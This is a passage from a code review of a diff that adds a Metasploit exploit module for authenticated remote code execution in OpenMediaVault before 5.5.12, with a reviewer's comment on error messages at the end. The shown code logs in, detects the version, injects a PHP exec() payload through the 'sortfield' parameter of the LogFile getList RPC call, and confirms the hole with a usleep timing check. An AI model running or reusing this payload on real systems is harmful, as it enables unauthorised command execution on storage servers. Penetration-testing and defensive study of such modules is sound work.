modules/exploits/unix/webapp/openmediavault_rpc_rce.rb

```diff
@@ -0,0 +1,226 @@
+      @cookie = res.get_cookies
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    return nil
+  end
+
+  def get_target(_opts = {})
+    print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'System',
+        "method": 'getInformation',
+        "params": nil,
+        "options": {
+          "updatelastaccess": false
+        }
+      }.to_json
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - Identified OpenMediaVault version #{version}.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+
+    return version
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'LogFile',
+        "method": 'getList',
+        "params": {
+          "id": 'apt_history',
+          "start": 0,
+          "limit": 50,
+          "sortfield": "'.exec(\"#{cmd}\").'",
+          "sortdir": 'DESC'
+        },
+        "options": nil
+      }.to_json
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
+    end
+
+    if @cookie.nil?
+      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    version = get_target
+    if version.nil?
+      # We don't print out an error message here as returning this will
+      # automatically cause Metasploit to print out an appropriate error message.
+      return CheckCode::Safe
+    end
+
+    delay = rand(7...15)
+    cmd = "\").usleep(#{delay}0000).(\""
+    vprint_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
+    t1 = Time.now.to_i
+    res = execute_command(cmd)
+    t2 = Time.now.to_i
+    unless res
+      vprint_error("#{peer} - Connection failed whilst trying to perform the code injection.")
+      return CheckCode::Detected
+    end
+    diff = t2 - t1
+    if diff >= 3
+      vprint_good("#{peer} - Response received after #{diff} seconds.")
+      return CheckCode::Vulnerable
+    end
+    vprint_error("#{peer} - Response wasn't received within the expected period of time.")
```

Comment:
Again this is a failure case, want to let user's know why we failed so they are aware of what went on and aren't getting failures with no info behind it.